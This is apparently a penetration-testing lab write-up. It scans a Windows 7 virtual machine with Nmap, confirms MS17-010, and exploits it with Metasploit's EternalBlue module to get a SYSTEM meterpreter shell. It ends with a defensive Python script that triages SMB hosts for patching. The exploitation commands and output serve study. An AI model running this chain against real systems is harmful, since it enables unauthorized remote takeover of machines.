# Nmap Vulnerability Scanning

###### tags: `Nmap`

### nmap -T4 -sn 192.168.43.0/24

```shell
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:39 EDT
Nmap scan report for kali (192.168.43.84)
Host is up (0.00071s latency).
Nmap scan report for 192.168.43.217
Host is up (0.0020s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.23 seconds
```

result: 192.168.43.217

### tcp scan

```
sudo nmap -T4 -sT -p T:1-65535 192.168.43.217
```

### syn scan

```
sudo nmap -T4 -sS -p T:1-65535 192.168.43.217
```

To restrict the port list to TCP ports, prefix it with `T:`, for example `-p T:1-65535`.

### Result:

```shell
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:44 EDT
Nmap scan report for 192.168.43.217
Host is up (0.00033s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
2869/tcp  open  icslap
3389/tcp  open  ms-wbt-server
4623/tcp  open  unknown
4624/tcp  open  unknown
5357/tcp  open  wsdapi
10243/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:0C:29:DA:FD:12 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 26.37 seconds
```

### Enumerate the detailed versions of the open services

```
nmap -sV -T4 192.168.43.217
```

```shell
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:51 EDT
Nmap scan report for 192.168.43.217
Host is up (0.00098s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
554/tcp   open  rtsp?
2869/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp  open  ssl/ms-wbt-server?
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
10243/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49157/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: LIAR-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.02 seconds
```

### Guess the target's operating system version

```
sudo nmap -T4 -sT -O 192.168.43.217
```

```shell
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:58 EDT
Nmap scan report for 192.168.43.217
Host is up (0.00069s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
554/tcp   open  rtsp
2869/tcp  open  icslap
3389/tcp  open  ms-wbt-server
5357/tcp  open  wsdapi
10243/tcp open  unknown
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:0C:29:DA:FD:12 (VMware)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.39 seconds
```

---

### nmap vulnerability scan

```
nmap -p 445 --script smb-vuln-ms17-010 192.168.43.217
```

### msfconsole:

```
search ms17-010
```

```
Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce
```

### Configure the options

```
use 3
show options
set rhosts 192.168.43.217
run
```

Vulnerable:

```
[+] 192.168.43.217:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.43.217:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

### Use the exploit

```
search ms17-010
exploit/windows/smb/ms17_010_eternalblue
show options
set rhosts 192.168.43.217
```

### A meterpreter shell is returned (used by default)

sysinfo

```
Computer        : LIAR-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_TW
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
```

shell (use the Windows shell)

```
C:\Windows\system32>
```

Shell encoding problems may produce garbled output (switch to code page 437, English)

```
chcp 437
```

whoami

```
C:\Windows\system32>whoami
whoami
nt authority\system
```

whoami /priv

```
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeTcbPrivilege                Act as part of the operating system       Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
```
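---

### Parsing scan results for patch triage (added example)

The script below is an added example, not code from this note or from the Nmap or Metasploit projects. It parses Nmap's normal output format, the same format shown in the service-detection (`-sV`) and OS-detection (`-O`) sections above, into per-host records, then flags every host that exposes SMB on tcp/445 and raises the priority when the service banner or OS fingerprint points to a Windows 7 / Server 2008-era build, which is exactly the population the `smb_ms17_010` scanner above reports as vulnerable. The embedded sample output is constructed (the first host mirrors this note's target, the second is invented to show a host that is skipped); `parse_nmap`, `triage_smb` and the regular expressions are this example's own names. For real automation, Nmap's XML output (`-oX`) is a more stable input than the screen format.

```python
"""Parse Nmap normal-format output and flag SMB-exposed hosts for MS17-010 patch
verification. Added example; not Nmap's or Metasploit's own code."""
import re

# Constructed sample in Nmap's normal output format (mixes -sV and -O lines).
# Host 1 mirrors the note's scan target; host 2 is invented.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-25 08:51 EDT
Nmap scan report for 192.168.43.217
Host is up (0.00098s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
Service Info: Host: LIAR-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Nmap scan report for lab-gw (192.168.43.1)
Host is up (0.0010s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap done: 2 IP addresses (2 hosts up) scanned in 128.02 seconds
"""

# "Nmap scan report for name (ip)" or "Nmap scan report for ip"
HOST_RE = re.compile(r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d+\.\d+\.\d+\.\d+)\)?$")
# "445/tcp   open  microsoft-ds   <version text, may be empty>"
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$")
# OS evidence from -O ("OS details:" / "Running:") and from -sV ("Service Info: ... OS: X;")
OS_RE = re.compile(r"^(?:OS details|Running): (.+)$")
SVC_OS_RE = re.compile(r"^Service Info: .*?OS: ([^;]+)")
# Builds most affected by MS17-010; a heuristic, since banners such as
# "Windows 7 - 10" are ranges rather than exact versions.
LEGACY_WINDOWS_RE = re.compile(r"Windows (7|Server 2008|8(\.1)?|Vista|XP)\b")


def parse_nmap(text):
    """Return a list of host dicts: ip, name, ports (list of dicts) and os_hints."""
    hosts, current = [], None
    for raw in text.splitlines():
        line = raw.rstrip()
        if (m := HOST_RE.match(line)):
            current = {"ip": m["ip"], "name": m["name"], "ports": [], "os_hints": []}
            hosts.append(current)
        elif current is None:
            continue  # header lines before the first host
        elif (m := PORT_RE.match(line)):
            current["ports"].append({
                "port": int(m["port"]), "proto": m["proto"], "state": m["state"],
                "service": m["service"], "version": m["version"].strip()})
        elif (m := OS_RE.match(line)) or (m := SVC_OS_RE.match(line)):
            current["os_hints"].append(m.group(1).strip())
    return hosts


def triage_smb(hosts):
    """Flag hosts with tcp/445 open; 'high' when the evidence points to a
    Windows 7 / Server 2008-era build, 'medium' for any other SMB exposure."""
    findings = []
    for h in hosts:
        smb = [p for p in h["ports"]
               if p["port"] == 445 and p["proto"] == "tcp" and p["state"] == "open"]
        if not smb:
            continue
        evidence = " | ".join([p["version"] for p in smb] + h["os_hints"])
        legacy = LEGACY_WINDOWS_RE.search(evidence) is not None
        findings.append({
            "ip": h["ip"],
            "priority": "high" if legacy else "medium",
            "action": ("verify MS17-010 patch level and disable SMBv1" if legacy
                       else "confirm SMB exposure is intended and SMBv1 is disabled"),
            "evidence": evidence,
        })
    return findings


if __name__ == "__main__":
    for f in triage_smb(parse_nmap(SAMPLE_NMAP_OUTPUT)):
        print(f"{f['ip']}: {f['priority']} - {f['action']}")
        print(f"  evidence: {f['evidence']}")
```

Feed it a saved scan (`nmap -sV -O -oN scan.txt ...`) by replacing `SAMPLE_NMAP_OUTPUT` with the file contents; the "high" finding for 192.168.43.217 is the cue to check the host's patch state with the `smb-vuln-ms17-010` script or the `smb_ms17_010` scanner shown above, rather than going straight to the exploit.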